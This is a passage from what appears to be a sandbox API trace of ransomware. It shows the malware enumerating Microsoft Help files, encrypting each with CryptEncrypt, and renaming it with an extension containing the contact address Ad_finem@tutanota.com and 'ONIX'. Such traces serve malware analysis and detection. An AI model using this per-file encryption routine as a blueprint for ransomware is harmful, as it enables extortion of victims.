CloseHandle (hObject=0x4d0) returned 1 [0122.137] GetProcessHeap () returned 0x410000 [0122.137] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.137] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.139] GetProcessHeap () returned 0x410000 [0122.139] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0122.139] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x113ae4d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x113ae4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1146cbb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.INFOPATHEDITOR.14.1033.hxn", cAlternateFileName="MSINFO~2.HXN")) returned 1 [0122.139] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.139] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.139] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x17c, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.140] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.140] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.140] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.140] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.140] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.140] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn") returned 64 [0122.140] GetProcessHeap () returned 0x410000 [0122.140] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf0) returned 0x44fb90 [0122.140] lstrcpyW (in: lpString1=0x44fb90, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" [0122.140] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.140] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=380) returned 1 [0122.140] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x17c [0122.140] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.140] GetProcessHeap () returned 0x410000 [0122.140] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.140] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.140] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.144] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.145] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.146] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x17c) returned 0x442938 [0122.146] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x17c) returned 0x46a0f0 [0122.146] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.146] ReadFile (in: hFile=0x4d0, lpBuffer=0x442938, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x17c, lpOverlapped=0x0) returned 1 [0122.146] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-380, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.146] WriteFile (in: hFile=0x4d0, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x17c, lpOverlapped=0x0) returned 1 [0122.147] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x17c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.147] CloseHandle (hObject=0x4d0) returned 1 [0122.148] GetProcessHeap () returned 0x410000 [0122.148] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.148] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.150] GetProcessHeap () returned 0x410000 [0122.150] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44fb90 | out: hHeap=0x410000) returned 1 [0122.150] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x15f8e210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15f8e210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1604c8f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSACCESS.14.1033.hxn", cAlternateFileName="MSMSAC~1.HXN")) returned 1 [0122.150] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.151] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.151] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x158, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.151] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.151] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.152] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.152] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.152] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.152] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn") returned 58 [0122.152] GetProcessHeap () returned 0x410000 [0122.152] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe4) returned 0x467908 [0122.152] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" [0122.152] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.152] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=344) returned 1 [0122.152] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x158 [0122.152] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.152] GetProcessHeap () returned 0x410000 [0122.152] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.152] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.152] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.156] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.157] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.157] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x158) returned 0x44faf8 [0122.158] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x158) returned 0x442938 [0122.158] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.158] ReadFile (in: hFile=0x4d0, lpBuffer=0x44faf8, nNumberOfBytesToRead=0x158, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x44faf8*, lpNumberOfBytesRead=0x367f44c*=0x158, lpOverlapped=0x0) returned 1 [0122.158] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-344, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.158] WriteFile (in: hFile=0x4d0, lpBuffer=0x442938*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesWritten=0x367f44c*=0x158, lpOverlapped=0x0) returned 1 [0122.159] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x158, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.159] CloseHandle (hObject=0x4d0) returned 1 [0122.159] GetProcessHeap () returned 0x410000 [0122.159] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.159] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.161] GetProcessHeap () returned 0x410000 [0122.161] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0122.161] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x15f8e210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15f8e210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1604c8f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSACCESS.DEV.14.1033.hxn", cAlternateFileName="MSMSAC~2.HXN")) returned 1 [0122.161] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.162] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.162] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x170, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.162] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.162] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.162] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.162] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.162] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.162] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn") returned 62 [0122.162] GetProcessHeap () returned 0x410000 [0122.162] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xec) returned 0x44faf8 [0122.162] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" [0122.162] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.162] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=368) returned 1 [0122.162] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x170 [0122.162] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.163] GetProcessHeap () returned 0x410000 [0122.163] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.163] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.163] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.167] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.168] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.169] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x170) returned 0x442938 [0122.169] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x170) returned 0x46a0f0 [0122.169] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.169] ReadFile (in: hFile=0x4d0, lpBuffer=0x442938, nNumberOfBytesToRead=0x170, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x170, lpOverlapped=0x0) returned 1 [0122.169] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-368, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.169] WriteFile (in: hFile=0x4d0, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x170, lpOverlapped=0x0) returned 1 [0122.170] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x170, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.170] CloseHandle (hObject=0x4d0) returned 1 [0122.171] GetProcessHeap () returned 0x410000 [0122.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.171] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.dev.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.173] GetProcessHeap () returned 0x410000 [0122.173] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0122.173] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSOUC.14.1033.hxn", cAlternateFileName="MSMSOU~1.HXN")) returned 1 [0122.173] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.173] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.174] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x146, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.174] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.174] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.174] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.174] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.174] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.174] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn") returned 55 [0122.174] GetProcessHeap () returned 0x410000 [0122.174] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xde) returned 0x44faf8 [0122.174] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" [0122.174] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.174] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=326) returned 1 [0122.174] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x146 [0122.174] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.174] GetProcessHeap () returned 0x410000 [0122.175] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.175] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.175] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.177] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.179] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.180] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x146) returned 0x442938 [0122.180] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x146) returned 0x46a0f0 [0122.180] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.180] ReadFile (in: hFile=0x4d0, lpBuffer=0x442938, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x146, lpOverlapped=0x0) returned 1 [0122.180] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-326, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.180] WriteFile (in: 